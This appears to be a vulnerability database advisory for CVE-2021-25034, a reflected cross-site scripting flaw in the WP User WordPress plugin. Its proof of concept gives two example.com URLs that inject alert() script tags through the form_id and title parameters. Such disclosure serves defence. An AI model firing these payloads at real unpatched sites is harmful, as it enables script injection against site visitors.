WP User < 7.0 – Reflected Cross-Site Scripting | CVE 2021-25034 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape some parameters in pages where the [wp_user] shortcode is used, leading to Reflected Cross-Site Scripting issues

Proof of Concept

PAGE_WITH_SHORTCODE is a page with the [wp_user] shortcode embed

https://example.com/?page_id={PAGE_WITH_SHORTCODE}&form_id="><script>alert(/XSS/)</script>
https://example.com//?page_id={PAGE_WITH_SHORTCODE}&form_id=1&title=<script>alert(2)</script>

Affects Plugins

Fixed in 7.0

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Jeremie Amsellem

Submitter

Jeremie Amsellem

Submitter website

https://fenrir.pro

Submitter twitter

Verified

Yes

WPVDB ID

c4e50dd2-450f-413d-b15f-ece413e42157

Timeline

Publicly Published

2022-01-31 (about 2 years ago)

Added

2022-01-31 (about 2 years ago)

Last Updated

2022-04-12 (about 2 years ago)

Other

Published

Title

Published

2022-09-14

Title

Notice Board <= 1.1 - Contributor+ Stored Cross-Site Scripting

Published

2019-04-09

Title

WP Statistics <= 12.6.3 - Referer Cross-Site Scripting (XSS)

Published

2023-01-03

Title

Justified Gallery < 1.7.1 - Contributor+ Stored XSS via Shortcode

Published

2016-09-10

Title

MailPoet Newsletters <= 2.7.2 - Authenticated Reflected Cross-Site Scripting (XSS)

Published

2024-04-16

Title

WP Stripe Checkout < 1.2.2.42 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode